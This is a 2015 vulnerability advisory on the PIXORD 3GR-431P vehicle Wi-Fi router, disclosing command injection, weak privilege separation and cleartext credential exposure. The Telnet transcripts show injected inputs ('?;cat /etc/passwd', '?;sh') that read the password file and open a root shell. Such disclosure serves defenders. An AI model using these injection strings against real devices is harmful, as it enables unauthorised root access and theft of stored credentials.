PIXORD Vehicle 3G Wi-Fi Router Command Injection / Information Disclosure
Posted on 03 October 2015
# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple Vulnerabilities] # Date: May 01, 2015 [No response from Vendor till date] # Discovered by: Karn Ganeshen # Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17] # Version: [Model Name :3GR-431P] [Software Version :RTA-A001_02] [Wireless Driver Version :2.6.0.0] *Vehicle 3G Wi-Fi Router - PIXORD * http://www.pixord.com/en/products_show.php?show=17 *Device Info * Model Name :3GR-431P Software Version :RTA-A001_02 Wireless Driver Version :2.6.0.0 PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless router. It supports Internet access via 3G and receives position information from GPS. 3GR-431P also supports two Ethernet ports for LAN connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity. It is available to install the 3GR-431P on the transportation. The passengers can use the laptop or smart phone via Wi-Fi to browse the Internet on the go. The Ethernet port also can connect IP camera to provide the real time monitoring. Vulnerability Impact: Easy and full device compromise. Access to configured keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user / vehicle via camera / connected devices. *Multiple Security Vulnerabilities * *1. OS command injection * $ telnet 192.168.1.10 Trying 192.168.1.10... Connected to 192.168.1.10. Escape character is '^]'. Vehicle 3G Wi-Fi Router Login: admin Password: > > ? mobile3G mobileGPS model reboot restoredefault version As seen above, only few specific, functional options are available for device management. However, we can bypass this and dump hashes easily. > ?;cat /etc/passwd sh: ?: not found admin:<password1>:0:0:Adminstrator:/:/bin/sh support:<password2>:0:0:Adminstrator:/:/bin/sh user:<password3>:0:0:Adminstrator:/:/bin/sh > exit Note that this is also applicable when a non-admin ‘user’ / ‘support’ logs in over the Telnet. The web application lacks strict input validation and hence vulnerable to OS command injection attack. *2. Configuration not secured properly / AuthZ issues * The device has three users - admin, support, user. Apparently, there is no separation of privileges between these 3 users, when accessing over HTTP(S). All options are available to all three then. This allows 'user' /'support' to access device configuration file - RT2880_Settings.dat. Configuration backup contains b64-encoded login passwords + clear-text WPA keys + other sensitive information. .. … *Sensitive information in configuration file - * *more RT2880_Settings.dat * #The following line must not be removed. Default WebInit=1 HostName=pixord Login=admin Password=<admin_password_here>= Login2=support Password2=<support_password_here>== Login3=user Password3=<user_password_here>== OperationMode=1 Platform=RT3352 ..... <snip> ..... wan_pppoe_user=pppoe_user wan_pppoe_pass=pppoe_passwd wan_l2tp_server=l2tp_server wan_l2tp_user=l2tp_user wan_l2tp_pass=l2tp_passwd ..... <snip> ..... wan_pptp_server=pptp_server wan_pptp_user=pptp_user wan_pptp_pass=pptp_passwd ..... <snip> ..... DDNS= DDNSAccount=<ddns_account_name_here> DDNSPassword=<ddns_password_here> CountryRegion= CountryRegionABand= CountryCode= BssidNum=1 SSID1=PiXORD WirelessMode=9 ..... <snip> ..... WscSSID=RalinkInitialAP WscKeyMGMT=WPA-EAP WscConfigMethod=138 WscAuthType=1 WscEncrypType=1 WscNewKey=<wsc_key_here> IEEE8021X=0 IEEE80211H=0 CSPeriod=6 PreAuth=0 AuthMode=WPAPSKWPA2PSK EncrypType=TKIPAES RekeyInterval=3600 RekeyMethod=TIME PMKCachePeriod=10 WPAPSK1=<WPA_PSK_Key_here> DefaultKeyID=2 Key1Type=0 Key1Str1= Key2Type=0 Key2Str1= Key3Type=0 Key3Str1= Key4Type=0 Key4Str1= WapiPskType=0 ..... <snip> ..... WdsEnable=0 WdsEncrypType=NONE WdsList= WdsKey= WirelessEvent=0 RADIUS_Server=0 RADIUS_Port=1812 RADIUS_Key= RADIUS_Acct_Server= RADIUS_Acct_Port=1813 RADIUS_Acct_Key= ..... <snip> ..... wan_3g_apn=public wan_3g_dial=*99# wan_3g_user= wan_3g_pass= <snip> RADIUS_Key1=<radius_key_here> ..... <snip> ..... Also, as observed in point 1 above, all the users have a UID 0, i.e. root level privileges to the device: admin:<password1>:0:0:Adminstrator:/:/bin/sh support:<password2>:0:0:Adminstrator:/:/bin/sh user:<password3>:0:0:Adminstrator:/:/bin/sh The application should ideally provide specific privileges to different users, and enforce strict access control. *3. Application does not secure configured passwords (HTTPS) * Masked password(s) can be retrieved via frame source (inspect element) and / or intercepting request via a proxy. The application should mask/censure (*****) the passwords, keys and any other crucial pieces of configuration and must not pass the values in clear-text. *4. Program / Scripts running in an insecure manner - leaking clear-text passwords in process information * After logging in to the device over Telnet, we can drop in to a shell via OS command injection attack described in point 1. > ?;sh sh: ?: not found Enter 'help' for a list of built-in commands. BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash) # Checking running processes reveal a system program *inadyn*, which apparently is a service for ddns connectivity, leaking valid username and password in clear-text. # ps aux PID USER VSZ STAT COMMAND 1 admin 1768 S init 2 admin 0 RWN [ksoftirqd/0] ..... <snip> ..... 2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>* -a *<ddns_domain_here>* 4050 admin 1768 R ps aux The programs should be run securely without passing cli arguments and parameter values in clear-text. -- Best Regards, Karn Ganeshen
